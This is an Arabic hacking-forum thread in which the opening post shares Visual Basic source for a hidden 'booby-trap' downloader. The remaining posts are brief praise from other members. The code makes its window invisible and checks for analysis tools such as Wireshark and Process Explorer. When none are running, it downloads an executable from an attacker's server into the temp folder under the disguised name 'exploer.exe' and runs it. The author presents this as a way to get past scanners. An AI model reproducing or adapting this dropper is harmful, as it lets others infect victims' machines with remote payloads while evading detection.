1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : ♕| м α s к о и |♕ | المشاهدات : 377 | الردود : 9
حالة الموضوع:
مغلق
  1. ♕| м α s к о и |♕ موقوف لمخالفة الشروط

    الأنتساب:
    ‏9 يوليو 2015
    المشاركات:
    1
    الإعجابات المتلقاة:
    6
    نقاط الجائزة:
    15
    الوظيفة:
    مـصـور فـوتوغرآفي
    الإقامة:
    بــغــدآد
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    Visual Basic
    Facebook:
    YouTube:
    السلام عليكم ورحمه الله وبركاتة #
    فكرة بتلغيمه جميلة جدآ وقديمه
    #


    هاذ لفكرة دامت عدي تقريبآ من ( 6 - 9 ) شهور
    #


    وقوية ويمكنك تطويرهآ يعني بتخليها تتخطي برمامج الفحص
    #

    آلتلغيمه عبآرة عن داولدر يعمل في الخفاء اي يعني من يجيي الفاحص يحلل لا يوجد شي :)
    #



    [​IMG]



    ويمكنك تبديل كود الداولدر الى هاذ الكود
    كود:
    Imports Microsoft.VisualBasic.CompilerServices
    Public Class Form1
     
     
        Private Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load
     
     
       Me.Opacity = 0
            Timer1.Interval = 1000
            Timer1.Start()
     
     
        End Sub
     
     
        Private Sub Timer1_Tick(sender As Object, e As EventArgs) Handles Timer1.Tick
     
     
            Dim ali() As String = {"cports", "Tcpview", "TcpEye", "procexp", "apateDNS", "IPBlocker", "ProcessExplorer", "SpeedGear", "wireshark", "DefenderDaemon", "ProcessHacker", "zlclient}
            If Process_Exist(ali) = False Then
     
     
                Dim web As New System.Net.WebClient
                web.DownloadFile("الرابط المباشر للسيرفر ", Environ("tmp") & "/exploer.exe")
                Shell(Environ("tmp") & "/exploer.exe")
            End If
        End Sub
        Private Function Process_Exist(ByVal Proc_Name As String()) As Boolean
            For Each p As Process In Process.GetProcesses
                Dim ProcessName As String = p.ProcessName.ToLower
                For Each p2 As String In Proc_Name
                    If ProcessName.Contains(p2.ToLower) Then
                        Return True
                        Exit Function
                    End If
                Next
            Next
            Timer1.Stop()
            Return False
        End Function
    End Class
    [FONT=Arial]
    *=== تحديد كود ===*
    [/FONT]

    طبعآ طريقة كشفها جدآ سهلة لاكنه تلغيمه جميلة
    #


    لتحميل السورس
    #


    M A S K O N
     
  2. فہٰايہٰروسہٰ الہٰديہٰوانہ ExpErt DeveloPer

    الأنتساب:
    ‏27 يونيو 2015
    المشاركات:
    708
    الإعجابات المتلقاة:
    511
    نقاط الجائزة:
    215
    الجنس:
    ذكر
    الوظيفة:
    سايق مخده
    الإقامة:
    ربي يحفظك ياعراق
    نظام التشغيل:
    windows 8.1
    اللغة البرمجية:
    Perl
    Facebook:
    رد: بفكرة جميلة وتخطي آلفاحصين على طريقة الكبآر #

    استمر عاشت ايدك حبيبي
    ورده (ضـــلعي)
     
  3. ♕| м α s к о и |♕ موقوف لمخالفة الشروط

    الأنتساب:
    ‏9 يوليو 2015
    المشاركات:
    1
    الإعجابات المتلقاة:
    6
    نقاط الجائزة:
    15
    الوظيفة:
    مـصـور فـوتوغرآفي
    الإقامة:
    بــغــدآد
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    Visual Basic
    Facebook:
    YouTube:
    رد: بفكرة جميلة وتخطي آلفاحصين على طريقة الكبآر #

    تدلل بعد روحي #
     
  4. تويتي العراقي <span style="font-weight: bold; text-shadow: #BBBB Developer

    الأنتساب:
    ‏8 مايو 2015
    المشاركات:
    114
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    50
    نظام التشغيل:
    windows 8.1
    اللغة البرمجية:
    Perl
    Facebook:
    رد: بفكرة جميلة وتخطي آلفاحصين على طريقة الكبآر #

    عاشت ايدك عزيزي
     
  5. آرْ بْيْ جْيْ ڪْرْڪْوْڪْ DeveloPer Plus

    الأنتساب:
    ‏24 أغسطس 2015
    المشاركات:
    147
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    40
    نظام التشغيل:
    windows 8
    اللغة البرمجية:
    Visual Basic
    رد: بفكرة جميلة وتخطي آلفاحصين على طريقة الكبآر #

    عشت ورده
    فكره حلوه
     
  6. A-R Developer

    الأنتساب:
    ‏2 يوليو 2015
    المشاركات:
    347
    الإعجابات المتلقاة:
    7
    نقاط الجائزة:
    50
    الإقامة:
    العراق العظيم
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    Visual Basic
    Facebook:
    رد: بفكرة جميلة وتخطي آلفاحصين على طريقة الكبآر #

    رررررررووووووووعة احسنت استمر ​
     
  7. ♕| м α s к о и |♕ موقوف لمخالفة الشروط

    الأنتساب:
    ‏9 يوليو 2015
    المشاركات:
    1
    الإعجابات المتلقاة:
    6
    نقاط الجائزة:
    15
    الوظيفة:
    مـصـور فـوتوغرآفي
    الإقامة:
    بــغــدآد
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    Visual Basic
    Facebook:
    YouTube:
    رد: بفكرة جميلة وتخطي آلفاحصين على طريقة الكبآر #

    تدلل اخوية #
     
  8. Sniper ALosh موقوف لمخالفة الشروط

    الأنتساب:
    ‏28 يونيو 2015
    المشاركات:
    17
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    اللغة البرمجية:
    Perl
    رد: بفكرة جميلة وتخطي آلفاحصين على طريقة الكبآر #

    فكره جميله
     
  9. Mira Mrmr .::|| زهره منتدى عراق تيم ||::. مشرفات المنتدى

    الأنتساب:
    ‏9 يوليو 2015
    المشاركات:
    696
    الإعجابات المتلقاة:
    149
    نقاط الجائزة:
    105
    الجنس:
    أنثى
    الإقامة:
    Baghdad
    نظام التشغيل:
    windows 8.1
    Facebook:
    YouTube:
    رد: بفكرة جميلة وتخطي آلفاحصين على طريقة الكبآر #

    [​IMG]شكرا الك فكره حلؤه[​IMG]
     
  10. ♕| м α s к о и |♕ موقوف لمخالفة الشروط

    الأنتساب:
    ‏9 يوليو 2015
    المشاركات:
    1
    الإعجابات المتلقاة:
    6
    نقاط الجائزة:
    15
    الوظيفة:
    مـصـور فـوتوغرآفي
    الإقامة:
    بــغــدآد
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    Visual Basic
    Facebook:
    YouTube:
    رد: بفكرة جميلة وتخطي آلفاحصين على طريقة الكبآر #

    آنرتو #
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة